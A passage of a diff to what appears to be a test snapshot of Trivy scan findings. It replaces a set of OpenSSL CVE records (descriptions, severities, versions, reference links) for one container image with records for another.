CipherUpdate", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0465", + "value": "https://avd.aquasec.com/nvd/cve-2021-23840", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0465", + "value": "https://access.redhat.com/security/cve/CVE-2021-23840", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "value": "https://github.com/advisories/GHSA-qgm6-9472-pwq7", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://linux.oracle.com/cve/CVE-2021-23840.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0466", - "installedVersion": "1.1.1n-0+deb11u4", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0466", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0466", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", - ], - }, - "category": "Vulnerability", - "description": "The function X509_VERIFY_PARAM_add0_policy() is documented to -implicitly enable the certificate policy check when doing certificate -verification. However the implementation of the function does not -enable the check which allows certificates with invalid or incorrect -policies to pass the certificate verification. - -As suddenly enabling the policy check could break existing deployments it was -decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() -function. - -Instead the applications that require OpenSSL to perform certificate -policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly -enable the policy check by calling X509_VERIFY_PARAM_set_flags() with -the X509_V_FLAG_POLICY_CHECK flag argument. - -Certificate policy checks are disabled by default in OpenSSL and are not -commonly used by applications.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "Certificate policy check not enabled", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0466", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0466", + "value": "https://security.gentoo.org/glsa/202103-03", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "value": "https://ubuntu.com/security/notices/USN-4738-1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "value": "https://ubuntu.com/security/notices/USN-5088-1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-23840", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "value": "https://www.debian.org/security/2021/dsa-4855", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://www.openssl.org/news/secadv/20210216.txt", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://www.tenable.com/security/tns-2021-03", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-09", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-10", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-6755", - "installedVersion": "1.1.1n-0+deb11u4", + "fixedVersion": "1.1.1k-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-3450", + "installedVersion": "1.1.1g-r0", "packageName": "libssl1.1", "references": [ - "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", - "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", - "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", - "http://rump2007.cr.yp.to/15-shumow.pdf", - "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", - "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", - "http://www.securityfocus.com/bid/63657", - "https://access.redhat.com/security/cve/CVE-2007-6755", - "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", - "https://www.cve.org/CVERecord?id=CVE-2007-6755", - "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "http://www.openwall.com/lists/oss-security/2021/03/27/1", + "http://www.openwall.com/lists/oss-security/2021/03/27/2", + "http://www.openwall.com/lists/oss-security/2021/03/28/3", + "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "https://access.redhat.com/security/cve/CVE-2021-3450", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b", + "https://github.com/advisories/GHSA-8hfj-xrj2-pm22", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "https://linux.oracle.com/cve/CVE-2021-3450.html", + "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3450", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "https://rustsec.org/advisories/RUSTSEC-2021-0056.html", + "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210326-0006/", + "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "https://www.cve.org/CVERecord?id=CVE-2021-3450", + "https://www.openssl.org/news/secadv/20210325.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-05", + "https://www.tenable.com/security/tns-2021-08", + "https://www.tenable.com/security/tns-2021-09", ], }, "category": "Vulnerability", - "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", + "description": "The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates. If a "purpose" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named "purpose" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application. In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose. OpenSSL versions 1.1.1h and newer are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1h-1.1.1j).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "Dual_EC_DRBG: weak pseudo random number generator", + "name": "openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-6755", - }, - { - "type": "URL", - "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", - }, - { - "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-3450", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", }, { "type": "URL", - "value": "http://rump2007.cr.yp.to/15-shumow.pdf", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", }, { "type": "URL", - "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", }, { "type": "URL", - "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/63657", + "value": "https://access.redhat.com/security/cve/CVE-2021-3450", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2007-6755", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "value": "https://github.com/advisories/GHSA-8hfj-xrj2-pm22", }, { "type": "URL", - "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-0928", - "installedVersion": "1.1.1n-0+deb11u4", - "packageName": "libssl1.1", - "references": [ - "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", - "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", - "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", - "http://www.osvdb.org/62808", - "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", - "https://access.redhat.com/security/cve/CVE-2010-0928", - "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", - "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", - "https://www.cve.org/CVERecord?id=CVE-2010-0928", - ], - }, - "category": "Vulnerability", - "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "openssl: RSA authentication weakness", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-0928", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", }, { "type": "URL", - "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "value": "https://linux.oracle.com/cve/CVE-2021-3450.html", }, { "type": "URL", - "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", }, { "type": "URL", - "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", }, { "type": "URL", - "value": "http://www.osvdb.org/62808", + "value": "https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html", }, { "type": "URL", - "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3450", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-0928", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", }, { "type": "URL", - "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0056.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", + "value": "https://security.gentoo.org/glsa/202103-03", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0464", - "installedVersion": "1.1.1n-0+deb11u4", - "packageName": "openssl", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0464", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0464", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230322.txt", - ], - }, - "category": "Vulnerability", - "description": "A security vulnerability has been identified in all supported versions - -of OpenSSL related to the verification of X.509 certificate chains -that include policy constraints. Attackers may be able to exploit this -vulnerability by creating a malicious certificate chain that triggers -exponential use of computational resources, leading to a denial-of-service -(DoS) attack on affected systems. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0464", + "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0464", + "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3450", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "value": "https://www.openssl.org/news/secadv/20210325.txt", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://www.tenable.com/security/tns-2021-05", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "value": "https://www.tenable.com/security/tns-2021-08", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", - }, - { - "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230322.txt", + "value": "https://www.tenable.com/security/tns-2021-09", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-2650", - "installedVersion": "1.1.1n-0+deb11u4", - "packageName": "openssl", + "fixedVersion": "1.1.1l-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-3712", + "installedVersion": "1.1.1g-r0", + "packageName": "libssl1.1", "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", + "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", + "https://access.redhat.com/security/cve/CVE-2021-3712", + "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", + "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "https://linux.oracle.com/cve/CVE-2021-3712.html", + "https://linux.oracle.com/errata/ELSA-2022-9023.html", + "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", + "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", + "https://security.gentoo.org/glsa/202209-02", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20210827-0010/", + "https://ubuntu.com/security/notices/USN-5051-1", + "https://ubuntu.com/security/notices/USN-5051-2", + "https://ubuntu.com/security/notices/USN-5051-3", + "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", + "https://ubuntu.com/security/notices/USN-5088-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3712", + "https://www.debian.org/security/2021/dsa-4963", + "https://www.openssl.org/news/secadv/20210824.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-16", + "https://www.tenable.com/security/tns-2022-02", ], }, "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. - -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. - -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. - -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). - -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. - -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. - -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. - -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. - -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. - -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", + "description": "ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", + "name": "openssl: Read buffer overruns processing ASN.1 strings", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - }, - { - "type": "URL", - "value": 